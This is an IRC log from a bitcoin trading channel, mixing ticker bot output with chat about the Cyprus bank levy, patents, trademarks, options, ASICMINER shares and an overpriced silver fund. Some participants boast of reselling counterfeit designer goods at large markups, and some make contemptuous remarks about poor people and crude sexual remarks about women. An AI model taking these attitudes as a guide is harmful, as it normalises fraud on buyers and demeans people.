04:37:20 what are likely outcomes if the vote in parliament fails? Mar 20 04:37:31 benkay permanent banking vacation in cyprus. Mar 20 04:37:47 Well, I am thinking that it could swing to the other direction of totalatarianism.. in the US we are seeing a steady erosion of our freedoms, as the surveillance state becomes a reality. Mar 20 04:38:09 bgupta only for the people who elect to stay there. Mar 20 04:38:14 cuz if they reopen instant run Mar 20 04:38:21 most everyone of any import has left already however. Mar 20 04:38:27 [19:11] sure. We have to embrace transaction volume, more people == more success == more transactions Mar 20 04:38:29 not if you're friends with your local politicians, bgupta Mar 20 04:38:41 dub good quote. Mar 20 04:38:55 [BTCTC] [GSDPT] 100 @ 0.00482 = 0.482 BTC [+] Mar 20 04:38:59 and can purchase their friendship Mar 20 04:39:15 benkay even so it's safer to purchase it from a distance. Mar 20 04:39:26 much like putin's oligarchs. Mar 20 04:39:42 the reality is most citizens aren't technically adept to use privacy tools properly.. nor don't care, and it will be hard for those that aren't superrich to uproot their families on a (to most citizens) alarmist future view. Mar 20 04:39:58 bgupta why do the inept and poor matter in this discussion ? Mar 20 04:39:59 good lord of course they're not Mar 20 04:40:05 neither freedom nor politics are for them. Mar 20 04:40:40 [22:29] created ~300 mn usd worth of bitcoin wealth. SO FAR. This isn't over yet. Mar 20 04:40:49 mircea_popescu: worry about the intelligent poor. Mar 20 04:41:01 Bugpowder also true. was just doing a sort of "minimal eval" Mar 20 04:41:05 bgupta: the real reality is you've been a surveillance state since the '90s Mar 20 04:41:13 asciilifeform are these provably intelligent or just assumedly intelligent ? Mar 20 04:41:18 you're just starting to wake up Mar 20 04:41:22 ;;bids 50 Mar 20 04:41:22 There are currently 19157.386 bitcoins demanded at or over 50.0 USD, worth 1043997.85644 USD in total. | Data vintage: 52.3699 seconds Mar 20 04:41:28 dub: Yeah: Unofficially, now they are pushing really hard to make it official.. :( Mar 20 04:41:48 [BTCTC] [COGNITIVE] 1 @ 0.12202 BTC [-] Mar 20 04:41:51 [BTCTC] [COGNITIVE] 1 @ 0.12202 BTC [-] Mar 20 04:41:57 at least with it unofficial they had to think twice about using info they weren't supposed to have Mar 20 04:42:04 mircea_popescu: bioweapons. doesn't take a world-class brain. Mar 20 04:42:31 The truth is is that we live in an surveliannce state, BUT the watchers are pretty lazy, like most humans. Mar 20 04:42:31 mircea_popescu: and it only takes one. Mar 20 04:42:39 im not sure i follow. Mar 20 04:42:48 bioweapons? Mar 20 04:42:52 Bugpowder you ever saw my rural/urban graph ? Mar 20 04:43:00 R U talking GMO foods? Mar 20 04:43:01 mircea_popescu: intelligent poor could trash civilization permanently if they wanted to. Mar 20 04:43:10 mircea_popescu: nope Mar 20 04:43:14 asciilifeform okay. i guess they might have to then. Mar 20 04:43:20 does anyone here think GMO is bad? Mar 20 04:43:28 Bugpowder http://trilema.com/2012/anonimity-or-the-urban-versus-rural-dispute/ Mar 20 04:43:36 Bugpowder i think it's potentially bad. Mar 20 04:44:06 Bugpowder: the mainstream anti-GMO hysteria is a distraction from real issues re: control of food supplies. Mar 20 04:44:39 i dont have strong feelings about GMO, but everyone is NY is crazy about "organics" food.. Mar 20 04:44:49 though "organics" usually means crap Mar 20 04:45:08 whoa canadian bitcoins selling for $70 per coin? Mar 20 04:45:13 vampireb: signalling. Mar 20 04:45:13 ;;ticker Mar 20 04:45:13 the jewish deli still the best way to get edible food in ny Mar 20 04:45:14 BTCUSD ticker | Best bid: 60.29000, Best ask: 60.30000, Bid-ask spread: 0.01000, Last trade: 60.29000, 24 hour volume: 105617.40285754, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.36720 Mar 20 04:45:29 !ticker mpex s.dice Mar 20 04:45:30 [MPEX:S.DICE] 1D: 0.00383838 / 0.00434507 / 0.0051 (63488 shares, 275.86 BTC), 7D: 0.00383838 / 0.00476551 / 0.00599987 (134645 shares, 641.65 BTC), 30D: 0.00300001 / 0.00604938 / 0.0069 (2352566 shares, 14,231.58 BTC) Mar 20 04:46:15 men russian stores are fine here, though these are jewish russian anyway Mar 20 04:46:48 heh. Mar 20 04:46:51 This is a good summary of GMO from some who really understands the issues. http://www.michaeleisen.org/blog/?p=1135 Mar 20 04:47:50 Bugpowder: the only actual problem with GMO products is the "terminator seed," which gives American patent trolls total control over food supplies. Mar 20 04:48:15 patent trolls. good way to put it. Mar 20 04:48:38 [BTCTC] [ASICMINER-PT] 1 @ 0.8593 BTC [-] Mar 20 04:48:49 i am quiet sure that humans adapted to food too in the last 100 years... well look at all these fatties in US Mar 20 04:49:07 (reminds myself to go to gym tomorrow) Mar 20 04:49:13 My guess is that much of the anti-GMO hysteria is funded or at least encouraged by the GMO vendors, specifically to distract from this. Mar 20 04:50:08 I thought patent trolls are people that sue that are not acutally using the patent, NPEs for example. Mar 20 04:50:26 When nearly the entire opposition to something consists of idiot "back to nature" crackpots, a reasonable person starts to see it as a great idea. Mar 20 04:51:02 Bugpowder: that would be like saying that a fairytale "Bridge Troll" must never actually use his bridge. Mar 20 04:51:15 ha. good point. Mar 20 04:51:21 Bugpowder: if your entire revenue stream depends on patents, you're a patent troll. Mar 20 04:52:02 [BTCTC] [ASICMINER-PT] 7 @ 0.8593 = 6.0151 BTC [-] Mar 20 04:52:52 someone's going to get insanely wealthy using genomics to breed better corn Mar 20 04:53:11 why is a patent troll bad? They monetize intellectual property so small inventors can collect on people that rip them off, with reduced risk. Mar 20 04:53:13 instead of trying to engineer nature Mar 20 04:53:18 benkay: for some value of "better" this already happened. Mar 20 04:53:49 Bugpowder: have you ever been a small inventor and actually tried to prosecute a ripoff of your idea? Mar 20 04:53:52 benkay, what is the difference between "genomics" and trying to "engineer nature" Mar 20 04:54:05 [BTCTC] [ASICMINER-PT] 10 @ 0.8594 = 8.594 BTC [+] Mar 20 04:54:14 asciilifeform: I have some knowledge of the fields in which I invite debate. Mar 20 04:54:39 Bugpowder i fail to see a difference between patent trolls and any other ip rights trolls. Mar 20 04:54:43 Bugpowder: if you have the funds to prosecute a patent lawsuit in any jurisdiction that matters, you are by definition not a "small inventor." Mar 20 04:54:52 if you think riaa is making artitsts be paid you're perhaps going on wishful thinking Mar 20 04:55:22 There are plenty of plaintiff side contingency firms that will take your patent case if you have a valid claim and a decent damages model. Mar 20 04:55:27 FOR FREE Mar 20 04:55:40 inorite? Mar 20 04:55:40 actual history of crop yield improvement. Mar 20 04:55:40 until recently, rooted in breeding instead of engineering. Mar 20 04:55:40 and whoopee congratulations, we're so efficient in america that we got some *great* results by doing some weird stuff and then grew that everywhere. instant monoculture Mar 20 04:56:10 Bugpowder: patent trials are routinely won and lost on technicalities. And your opponent can drag the trial onwards into infinity, until you or the party representing you runs out of cash. Mar 20 04:56:32 benkay, the combination of selective breeding with targeted mutagenesis is MUCH more effective at increasing yield, quality AND adapting to pests. Mar 20 04:56:34 At least in the U.S., it is a straightforward contest of bank accounts. Mar 20 04:56:44 asciilifeform: sounds like you are talking about any court case Mar 20 04:57:02 asciilifeform: That is false in a contingency case. Mar 20 04:57:13 Let me suggest an alternative formulation of patent troll. Mar 20 04:58:09 patent troll = anyone who files afucking patent Mar 20 04:58:17 horrible business Mar 20 04:58:17 avoid at all costs Mar 20 04:58:33 A patent troll is someone who sues a large number of possibly infringing defendents, many small businesses, who lack the funds to defend themselves, and thus seek to shake down these defendents for a settlement that is slightly less than the cost of fighting it thru dismissal Mar 20 04:58:41 trademark abuse i think should be prosecuted under fraud and is a valid form of ip Mar 20 04:58:48 but patent have never been ethical Mar 20 04:58:48 This was perhaps the original patent troll: http://en.wikipedia.org/wiki/Association_of_Licensed_Automobile_Manufacturers Mar 20 04:58:49 bugpowder ooh with mutagenesis awesome i need sauce tho Mar 20 04:59:25 patent is fine, except where it was extended in term, and applied to sfotware and business methods. Mar 20 04:59:29 no Mar 20 04:59:32 If you use patents to keep a product off the market (or to keep it a luxury good whereas civilization might otherwise make it a mass good) you are a patent troll. Mar 20 04:59:33 I would say Apple suing Samsung, or Carnegie Mellon suing Marvell is not a patent troll. Mar 20 04:59:43 and must run now so pm plz bugpowder? Mar 20 04:59:46 i would say apple existing is a troll Mar 20 05:00:00 a patent troll is any entity which seeks to enrich itself by denominating and thus proposing to have captured anything which exists outside of and independent of their efforts. Mar 20 05:00:01 apple is one of life's trolls Mar 20 05:00:08 bgupta: The Bilski ruling has invalidated most software only patents Mar 20 05:00:16 apple is a user troll Mar 20 05:00:20 btw i'm still buying patents in exchange for btc Mar 20 05:00:27 pigeons: if all Apple patents were voided tomorrow, would there be a flood of Apple-quality products from other vendors? Mar 20 05:00:28 in this reading any attempt to patent anything to do with gmo is patent trolling. Mar 20 05:00:28 if anyone has any good cheap ones Mar 20 05:00:36 [BTCTC] [ASICMINER-PT] 3 @ 0.8596 = 2.5788 BTC [+] Mar 20 05:00:37 you may patent the process, you may not patent the result, inasmuch as the result is a plant Mar 20 05:00:40 asciilifeform: NOPE Mar 20 05:00:44 god i hope we never have apple "quality" products from anyone Mar 20 05:00:48 When was that? I thought that it was still up in the air? Mar 20 05:00:57 Bilski was over a year ago Mar 20 05:01:02 any attempt to use force to control ideas is trolling Mar 20 05:01:10 pigeons: if you have no love for Apple-style products, why are their patents a problem for you? Mar 20 05:01:12 as a more general formulation, yes pigeons Mar 20 05:01:18 Ruling is that the software must interact with a physical machine Mar 20 05:01:26 all patents are a problem all copyrights for all humans Mar 20 05:01:34 provides an additional test for KO software only claims Mar 20 05:01:40 wait that didn't have blanket applicability the supreme court specifically made a very narrow ruling deferring the question of patentability for a future court/case Mar 20 05:01:40 tradmarks can stay Mar 20 05:01:54 trademarks must stay even. Mar 20 05:01:58 yeah Mar 20 05:02:08 yes.. Mar 20 05:02:08 I think it is being read fairly broadly by the community Mar 20 05:02:17 [BTCTC] [ASICMINER-PT] 2 @ 0.8596 = 1.7192 BTC [+] Mar 20 05:02:38 certainly it is influencing what cases are now being brought and what are discarded based on 'bilski vulnerability' Mar 20 05:02:45 It however could have been in worse.. and they could have affirmed the validity of sfotware patents Mar 20 05:02:48 trademarks are appealing if you think that competitors could actually fool chumps into thinking they are buying your product. Mar 20 05:03:04 [BTCTC] [ASICMINER-PT] 1 @ 0.8596 BTC [+] Mar 20 05:03:09 asciilifeform trademarks are really just a way to prevent idiots from abusing "some" names. Mar 20 05:03:17 mircea_popescu: if someone were to open a fake MPEx, would anyone be fooled? Why do you need trademarks enforced by governments? Mar 20 05:03:19 basically, marketing consists on trying to extract value from a word. Mar 20 05:03:29 to the detriment of everyone else. it's a society-wide language-wide externality. Mar 20 05:03:36 if you pass yourself off as something you're not, that is fraud to me Mar 20 05:03:41 the association of shitproduct with "superior" damages the word superior Mar 20 05:03:48 mircea_popescu: why not extract it from a PGP public key instead? can't be faked, and doesn't need armed thugs to enforce. Mar 20 05:03:50 then when i say superior people misunderstand me, thus making me explain. Mar 20 05:03:55 i should get paid by shitproduct for this. Mar 20 05:04:27 asciilifeform: interesting Mar 20 05:04:33 so in general, until marketing can be outlawed completely, trademarking is a bandaid Mar 20 05:05:09 no marketing? how will we bring bitcoin to wall street? Mar 20 05:05:14 heh. Mar 20 05:05:21 you buy an XYZ pair of shoes. and it would come with a unique (verifiable through the net) RSA-signed message, with a serial number, stating that the unit is genuine and was sold in such-and-such a place on such a date. Mar 20 05:05:33 seriously, if us libertards did smart shit (such as ban any advertising) instead of dumb shit (ban smoking) Mar 20 05:05:42 we'd be looking at a muchly different us balance of trade Mar 20 05:05:45 and truth is me and many other will happily pay less for the "fake" shoes Mar 20 05:06:02 pirated shit is the best Mar 20 05:06:16 BitHub just as long as you can identify what it is you're buying. Mar 20 05:06:24 many lv bags, wallets sunnies overseas Mar 20 05:06:28 this is the underpinning of free markets : being able to evaluate what you buy and what you pay for it. Mar 20 05:06:29 over the years* Mar 20 05:06:30 pigeons: trademarks existing is the whole reason why we have chumps willing to pay for names instead of physical properties of the product. Mar 20 05:06:41 sold them back to my friends at like 500% profits Mar 20 05:06:44 they didn't care Mar 20 05:07:09 im more worried about shipping sunglasses from china than ordering from silk road Mar 20 05:07:36 better off going there and buying up and bringing a years worth back Mar 20 05:07:50 the right way to deal with fraud is to make it instantly and physically detectable at the scene in as many cases as possible. and not post-facto enforcement. Mar 20 05:07:57 this would be civilisational colonisation btw. Mar 20 05:08:08 typical of the interaction between a more advanced and a less advanced civilisation Mar 20 05:08:17 those dr dre beat headphones Mar 20 05:08:19 germans went to buy shit in rome etc. Mar 20 05:08:19 prime directive Mar 20 05:08:32 bought some for like 50$ sounds exactly the same, same chinese factory that's why Mar 20 05:08:34 asciilifeform that's a point. Mar 20 05:08:50 mircea_popescu: the problem with that kind of interaction is that it uses a thermodynamic gradient, if you will. one that eventually levels out. Mar 20 05:09:10 china will eventualyl level out. Mar 20 05:09:33 mircea_popescu: the leveling can go in either direction, of course. unlike a heat engine. Mar 20 05:09:45 haha Mar 20 05:09:53 i just love going to china town and buying 10 ray ban sunnies for the price of 1 Mar 20 05:09:58 and its the same quality Mar 20 05:10:13 [BTCTC] [GSDPT] 100 @ 0.004231 = 0.4231 BTC [-] Mar 20 05:10:15 there is shit stuff of course you have to look out for but i only get the best pirated stuff Mar 20 05:10:42 mircea_popescu: the most likely conclusion, of course, is that the "hot" side grows lax and lazy from the cheap labour traded for goodies by the "cold" side. and the latter eventually sacks Rome. Mar 20 05:10:42 [BTCTC] [PAJKA.BOND] 4 @ 0.105 = 0.42 BTC [+] Mar 20 05:10:58 it's how the civilisation engine has been working so far yes. Mar 20 05:11:16 nothing wrong with it, either. i think it's perfect Mar 20 05:11:27 and it's also why i laugh at silly notions such as midnightmagic's "progress" Mar 20 05:12:34 mircea_popescu: its perfect right up to the moment some disgruntled grad school dropout in Mumbair turns loose the superplague. Mar 20 05:14:51 fucking over the stupid and the impotent is safe. but who can be 100% sure that those are the only ones he is fucking over? Mar 20 05:18:28 sounds like the army of the 12 monkeys Mar 20 05:18:52 smickles: not if you actually saw the film. Mar 20 05:19:33 asciilifeform: huh? Mar 20 05:19:38 i have seen the film Mar 20 05:20:07 are you just being a pedant? Mar 20 05:20:15 smickles: I suppose I spoiled it already for everyone who hasn't. Mar 20 05:21:01 asciilifeform nobody. but that's not really the point, now is it ? Mar 20 05:21:09 ;;ticker Mar 20 05:21:09 you can't suspend action until you're 100% sure. Mar 20 05:21:10 BTCUSD ticker | Best bid: 60.28000, Best ask: 60.29000, Bid-ask spread: 0.01000, Last trade: 60.29000, 24 hour volume: 106776.94964017, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.47866 Mar 20 05:21:15 ;;goxlag Mar 20 05:21:16 0 seconds Mar 20 05:21:29 and that mumbairite can always drop by and say hi. especially if she has nice legs and a thick ass i'll be interested. Mar 20 05:21:30 help me pick the color of my lambo Mar 20 05:21:52 Bowjob salmon. Mar 20 05:21:58 mhm Mar 20 05:22:05 salmon aventador Mar 20 05:22:32 mircea_popescu: great illustration right there, for why we're fucked: the grad student will be thinking of his sister, whoring for food in the West, when he pulls the trigger. Mar 20 05:22:36 !last m c310t Mar 20 05:22:37 I don't know those people, and they don't look very friendly. Mar 20 05:22:45 !last c310t Mar 20 05:22:45 The vision of Christ that thou dost see ... is my vision's greatest enemy. Mar 20 05:22:49 asciilifeform a well. Mar 20 05:23:07 $vwap o.btcusd.c310t Mar 20 05:23:08 smickles: 1 day: no data 7 day: no data 30 day: average: 0.29789377 high: 0.31662031 low: 0.17554903 volume: 22028 btc: 6562.00388512 Mar 20 05:23:18 $depth o.btcusd.c310t Mar 20 05:23:19 smickles: Bids: ['1000 @ 0.44954682'] Mar 20 05:23:20 smickles: Asks: ['1000 @ 0.54818967'] Mar 20 05:23:44 ;;ticker Mar 20 05:23:46 BTCUSD ticker | Best bid: 60.27999, Best ask: 60.30000, Bid-ask spread: 0.02001, Last trade: 60.27999, 24 hour volume: 106733.98262924, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.48785 Mar 20 05:24:04 -Uo Mar 20 05:24:08 buh Mar 20 05:24:47 !ticker m p750t Mar 20 05:24:48 [MPEX:O.BTCUSD.P750T] 1D: 0.35270204 / 0.49421702 / 0.50754217 (12009 shares, 5,935.05 BTC), 7D: 0.35270204 / 0.49421702 / 0.50754217 (12009 shares, 5,935.05 BTC), 30D: 0.35270204 / 0.89701544 / 1.53153505 (40792 shares, 36,591.05 BTC) Mar 20 05:24:52 that thang... Mar 20 05:25:16 ;;calc 36591.05*[ticker --last] Mar 20 05:25:18 2196384.36264 Mar 20 05:26:25 fuppin pitooty Mar 20 05:27:07 piwho ? Mar 20 05:28:57 this price is making my brain melt Mar 20 05:30:01 [MPEX] [O.BTCUSD.C450T] 231 @ 0.22 = 50.82 BTC [+] Mar 20 05:30:01 yeah srsly. Mar 20 05:30:31 mircea_popescu: you should put up "oderint dum metuant" as a subtitle on your site. Mar 20 05:30:55 mircea_popescu: if I'm not mistaken, it sums up your political angle nicely. Mar 20 05:30:59 haha Mar 20 05:31:22 it's only my angle with regards to politics of reality. Mar 20 05:31:32 people don't like capitalism ? fuck them. Mar 20 05:31:37 [MPEX] [S.MPOE] 5800 @ 0.00074197 = 4.3034 BTC [+] Mar 20 05:31:44 people wish to legislate against the fact that their wife will cheat ? Mar 20 05:31:46 fuck them too. Mar 20 05:32:35 mircea_popescu: I argue that, just as it is better to have a wife who doesn't cheat, it is also good to not be hated. especially if this can be accomplished at reasonable cost. Mar 20 05:32:53 the feelings of others are their problem, not something that can ever carry a cost. Mar 20 05:32:59 when i wish to pay whores i'll say. Mar 20 05:33:41 mircea_popescu: this sounds perfectly logical inside your head, until you're outnumbered and outgunned, and down on your knees - ready to please? Mar 20 05:33:43 this, incidentally, is the path towards a harem of wives who aren't particularly inclined to cheat, among other goodies. Mar 20 05:33:59 yea well, let's just say i'm a lucky sort. haven't been outgunned yet. Mar 20 05:34:10 being married, wives, gf's etc its for poor lonely people Mar 20 05:35:14 its a hobby Mar 20 05:35:25 you gotta _do_ something Mar 20 05:35:38 or "do something" Mar 20 05:36:07 i'm just pass that point, cant do that normal shit Mar 20 05:36:54 too busy with the fake raybans ? Mar 20 05:38:07 its just another overhead Mar 20 05:38:31 less chicks more space for raybans Mar 20 05:39:09 mo raybans mo powerbeams Mar 20 05:39:52 less tang more ray Mar 20 05:41:24 anyway, i've just noticed its poor, lonely people who are really desperate for female companionship Mar 20 05:41:39 [MPEX] [O.BTCUSD.C430T] 4 @ 0.26082263 = 1.0433 BTC [+] Mar 20 05:42:17 mircea_popescu: "The only thing you cannot do with a bayonet is sit on it." (Talleyrand) Mar 20 05:42:30 mp, starting to think those options were not overpriced :) Mar 20 05:42:50 asciilifeform hehe one of the cleverer frenchmen. Mar 20 05:42:53 Chaang-Noi :p Mar 20 05:43:09 if only we knew yesterday what the evening of today spells out Mar 20 05:43:25 still, 29 days anything can happen Mar 20 05:43:55 ;;seen smickles Mar 20 05:43:55 smickles was last seen in #bitcoin-assets 14 minutes and 57 seconds ago: this price is making my brain melt Mar 20 05:44:36 asicminer is level, lc is level and btc way up, going to be a good day:) Mar 20 05:44:51 T options expire on the 29th Mar 20 05:45:32 ahh Mar 20 05:45:53 64 looks like it might take a while Mar 20 05:45:57 ;;asks 64 Mar 20 05:46:04 There are currently 15921.487 bitcoins offered at or under 64.0 USD, worth 1002943.0276 USD in total. | Data vintage: 0.0017 seconds Mar 20 05:46:09 [BTCTC] [S.DICE-PT] 1 @ 0.00496 BTC [+] Mar 20 05:46:32 anyway, whoever sold those 12k 750T puts earlier is looking at something like 10k btc in profits atm Mar 20 05:46:48 no that's not right Mar 20 05:46:56 sold the puts? Mar 20 05:46:57 [BTCTC] [S.MPOE-PT] 5 @ 0.000719 = 0.0036 BTC [+] Mar 20 05:47:00 ;;calc .17 * 12 Mar 20 05:47:01 2.04 Mar 20 05:47:03 like 2k Mar 20 05:47:12 staco yea Mar 20 05:47:19 didn't the bot sell the puts? Mar 20 05:47:30 i think the bot bought Mar 20 05:47:44 i could be wrong, but I thought the bot sold them Mar 20 05:47:44 $depth O.BTCUSD.P750T Mar 20 05:47:46 mircea_popescu: Bids: ['1000 @ 0.33576135'] Mar 20 05:47:47 mircea_popescu: Asks: ['1000 @ 0.43628681'] Mar 20 05:48:02 i think at the time it was like .5 btc bid .8 btc ask Mar 20 05:48:08 so it couldn't have been Mar 20 05:52:47 [MPEX] [S.MPOE] 1544 @ 0.00075702 = 1.1688 BTC [+] Mar 20 05:52:49 [MPEX] [S.MPOE] 4150 @ 0.00075916 = 3.1505 BTC [+] Mar 20 05:55:55 [BTCTC] [ASICMINER-PT] 1 @ 0.827 BTC [-] Mar 20 05:55:57 [BTCTC] [ASICMINER-PT] 6 @ 0.827 = 4.962 BTC [-] Mar 20 05:55:59 [BTCTC] [ASICMINER-PT] 7 @ 0.826 = 5.782 BTC [-] Mar 20 05:56:01 [BTCTC] [ASICMINER-PT] 6 @ 0.824 = 4.944 BTC [-] Mar 20 05:56:03 [BTCTC] [ASICMINER-PT] 3 @ 0.823 = 2.469 BTC [-] Mar 20 05:57:29 wasn't this supposed to be 1 and etc ? Mar 20 05:57:34 !ticker btctc asicminer-pt Mar 20 05:57:36 [BTCT:ASICMINER-PT] 1D: 0.8221 / 0.85317 / 0.87 (167 shares, 142.5 BTC), 7D: 0.695 / 0.80182 / 0.9489 (1572 shares, 1260.5 BTC), 30D: 0.65 / 0.74901 / 1 (3052 shares, 2286 BTC) Mar 20 05:57:49 ic Mar 20 05:59:37 mp it traded at 1 but as it pays out dividends the value of the stock will go down, as the best dividends are the first ones Mar 20 05:59:59 the best dividends are the first ones? Mar 20 06:00:03 and these were bids being filled, still up over 800% :) Mar 20 06:00:07 i missed the context of that one Mar 20 06:00:25 i hought the plan was to increase % iof total hash Mar 20 06:00:37 they currently do what, 6th out of 30 ? Mar 20 06:00:57 oh asicminer Mar 20 06:01:02 the best dividends are or the highest dividends will odds are be the first .1 paid back, cuz it is only 1/1630000 not 1/400000 Mar 20 06:01:09 yeah but 6th today is worth more than 30 th in 3 months Mar 20 06:01:23 pigeons is right Mar 20 06:01:38 extra zeroes detectedf Mar 20 06:01:44 but yes they say they will be at 60 th by the end of april, and they will expand after that Mar 20 06:01:52 over all goal is to stay at or above 105 of the network Mar 20 06:02:09 yeah i did an extra 0 i need my coffee Mar 20 06:02:28 so if they're at 10% of network they permanently pay the same divs Mar 20 06:02:34 until block halves at least Mar 20 06:02:42 im not selling what i hold at these prices, however with btc being $60 im sure some people want to cash out Mar 20 06:03:02 yes mp, but their goal is to average at 105 not always be at 10% Mar 20 06:03:14 average is what we're talking about here tho Mar 20 06:03:26 or you think they'll slowly lose out ? Mar 20 06:03:45 of course they will Mar 20 06:03:47 they ahve like 15% now, if they get their 60 th before bfl then they will ahve over 50% Mar 20 06:03:53 what bitcoin venture goes as planned Mar 20 06:04:01 pigeons take mtgox for instance Mar 20 06:04:02 they wont stay just under 505 forever Mar 20 06:04:02 :D Mar 20 06:05:21 http://blockchain.info/pools?timespan=4days this looks remarkably healthy actually Mar 20 06:05:47 hopefully people understand the importance of deepbit and we see it about equal to btcguild Mar 20 06:05:55 deepbit is becoming obsolete Mar 20 06:06:06 eligius ftw Mar 20 06:06:23 especially now that fincen says mining = money transmission ;) Mar 20 06:06:25 kakobrekla they're running 0.3 iirc Mar 20 06:06:38 huh? Mar 20 06:06:41 i'd mine at a pool that specifically never upgrades. Mar 20 06:06:44 pigeons it does ? Mar 20 06:07:04 to some lawyers Mar 20 06:07:18 link or somfin' ? Mar 20 06:07:43 wait! coinlab found a block during the past 4 days ?! Mar 20 06:08:00 what with! maffs ? Mar 20 06:08:39 its just stupid talk, it clearly says you have to exchange for other funds or your a user not a transmitter Mar 20 06:09:01 pretty much Mar 20 06:10:22 like this really means much other than people who want to try to follow the law can Mar 20 06:10:36 [BTCTC] [COGNITIVE] 9 @ 0.16002 = 1.4402 BTC [+] Mar 20 06:11:00 [BTCTC] [COGNITIVE] 1 @ 0.22048 BTC [+] Mar 20 06:11:13 it means coinlab needs to find a new bank Mar 20 06:12:46 silicon valley bank not quite ready for wall street ? Mar 20 06:13:28 we'll see Mar 20 06:15:01 https://bitcointalk.org/index.php?topic=137459.msg1645540#msg1645540 Mar 20 06:15:04 jeez Mar 20 06:15:19 also wtf deadterra reality compas is off? Mar 20 06:19:32 deadterra has an issue vouching for the wrong people. Mar 20 06:19:37 it's like a disease. Mar 20 06:21:59 "I've been an "IT" person all my life and I have no idea how I missed out on things like buying Google or Apple. Bitcoin seems to be my last chance. Any tips would be appreciated." Mar 20 06:22:02 this is sweet. Mar 20 06:22:17 he has no idea how he could have missed it. taking public calls, what might have been the cause ? Mar 20 06:23:09 i cant even follow that stuff Mar 20 06:23:14 maybe the beer Mar 20 06:23:48 also in the news, at his local college there's all these fresh beauties looking for boyfriends all the time Mar 20 06:23:56 how could he have missed that too ?! Mar 20 06:24:00 life's hard but unfair! Mar 20 06:24:34 life is optional Mar 20 06:24:49 hahaha! Mar 20 06:24:50 https://bitcointalk.org/index.php?topic=137459.msg1641634#msg1641634 Mar 20 06:24:58 check out what she says and what usagi responds with Mar 20 06:25:03 jesus this is better than stand-up Mar 20 06:26:21 you are not a smart enoguh investor for his fan club Mar 20 06:27:06 haha Mar 20 06:27:08 yeah. i keep missing out on lots of hot btc deals because i am not smart enough Mar 20 06:27:17 honestly, it sucks, but what can i do. Mar 20 06:27:29 your points are interesting in and of themselves and I'm sure once you get on track with how we operate you will understand it. Mar 20 06:27:59 anyone wanna script usagi next meltdown ? Mar 20 06:29:53 ;;calc 0.1401 *[ticker --last] Mar 20 06:30:04 Error: Failure to retrieve ticker. Try again later. Mar 20 06:30:10 ;;goxlag Mar 20 06:30:12 hehe Mar 20 06:30:16 Error: invalid syntax (, line 1) Mar 20 06:30:19 um Mar 20 06:30:20 its foxxed Mar 20 06:30:27 mtgox website is down Mar 20 06:30:35 bejoysus Mar 20 06:30:43 ANYWAY. Mar 20 06:30:49 ;;calc 0.1401 *62 Mar 20 06:30:50 8.6862 Mar 20 06:30:56 they are re-scanning the blockchain for 0.8 Mar 20 06:30:57 seriously Mar 20 06:31:02 so usagi is selling silver at 86.86 dollars an ounce ?! Mar 20 06:31:22 can i short this thing anywhere ? Mar 20 06:31:25 [MPEX] [S.MPOE] 2706 @ 0.00076296 = 2.0646 BTC [+] Mar 20 06:31:40 i think so Mar 20 06:31:44 usagi is like diablo, value destroyer Mar 20 06:31:45 click the options tab Mar 20 06:31:46 eh he's on bitfunder Mar 20 06:31:54 on both bitfunder and btct Mar 20 06:31:55 anyone wanna be my bitfunder broker ? Mar 20 06:33:29 why? Mar 20 06:33:53 they don't charge 30 btc to join Mar 20 06:33:58 so ? Mar 20 06:34:09 so why do you need a broker? just join yourself Mar 20 06:34:13 heh. Mar 20 06:34:20 this is like... why am i not cutting my own hair. Mar 20 06:34:35 [00:27] yeah. i keep missing out on lots of hot btc deals because i am not smart enough Mar 20 06:34:35 [00:27] honestly, it sucks, but what can i do. Mar 20 06:34:40 quoting someone? Mar 20 06:34:47 Namworld nope Mar 20 06:34:53 deadterra Mar 20 06:34:57 i assume Mar 20 06:35:04 ah. Just missing out then. Mar 20 06:35:07 but im like a ball of furr so no skill needed Mar 20 06:35:09 On a few things Mar 20 06:35:12 no, i was just being honest. there's all these great deals offered all the time (especialyl in the lending section) Mar 20 06:35:18 that i never end up being smart enough to take. Mar 20 06:35:30 Honestly, if you knew what would happen when, you’d triple your BTC weekly. Mar 20 06:35:44 Thing is, there’s almost just as many losing proposals Mar 20 06:35:50 even more Mar 20 06:36:00 for any values of "almost as many" that approach infinity Mar 20 06:36:03 86 dollars an oz? and people buy it? oh lol Mar 20 06:36:13 Chaang-Noi not rly. Mar 20 06:36:25 TU.SILVER? Yeah... pricey Mar 20 06:36:39 well then who cares, i can offer gold at $5000 :) Mar 20 06:36:50 i suspect usagi has a future as a stand-up comedian pretending to be a btc finance guy Mar 20 06:37:07 course... that's a tough racket, there's what, 5000 of them ? Mar 20 06:38:09 what's silver spot these days anyway ? 40somthing ? Mar 20 06:38:39 http://i.imgur.com/w3p5sxK.png << cancel transation Mar 20 06:38:40 28 Mar 20 06:38:45 wait wut ? Mar 20 06:39:05 28.8$ silver Mar 20 06:39:10 uh. Mar 20 06:39:13 1612$ gold Mar 20 06:39:33 so if anyone buys tu.silver that's an insta-70% haircut ? Mar 20 06:40:08 yes Mar 20 06:40:09 cyprus should do this Mar 20 06:40:44 and usagi hopes silver goes down Mar 20 06:40:54 - /q bitcoin-goldRobo @silver Mar 20 06:41:03 by the way : the deal just got got. Mar 20 06:41:08 bitcoin-goldRobo> The #coinabul Silver Ticker: 0.482BTC per OZ of Silver, 0.015BTC per Gram of Silver and $28.92/OZ of Silver. Mar 20 06:41:16 http://www.nytimes.com/2013/03/20/business/global/cyprus-rejects-tax-on-bank-deposits.html?_r=0 Mar 20 06:41:54 yeah saw earlier on bbc Mar 20 06:41:59 while nap. Mar 20 06:42:32 https://btct.co/security/SILVER#tab6 click details Mar 20 06:43:03 YES 3 / 7 NO Mar 20 06:43:06 so how is it trading ?! Mar 20 06:44:01 "TU.SILVER is the largest precious metals fund in the community, and has more than 20 times the liquidity of all other precious metals funds combined." Mar 20 06:44:05 meanwhile Mar 20 06:44:12 We have been in operation on BitFunder since January 2013. We have over 50oz. in sales and have redeemed more than 10oz of silver directly to customers. Mar 20 06:44:21 so this community is not even able to pay for judas. Mar 20 06:45:20 BTCTRADINGPT voted NO with comment: BTC-TRADING-PT shareholders voted to not approve: 528-0 Mar 20 06:45:50 ouch Mar 20 06:46:28 say what you will of people, sheep, stupidity, what have you... in this case at least i can find no flaw. Mar 20 06:47:32 haha i like how right in the contract on btct.co it says, "We have an exclusive arrangement with BitFunder to support BitFunder as a platform. We will not trade on any other exchange until 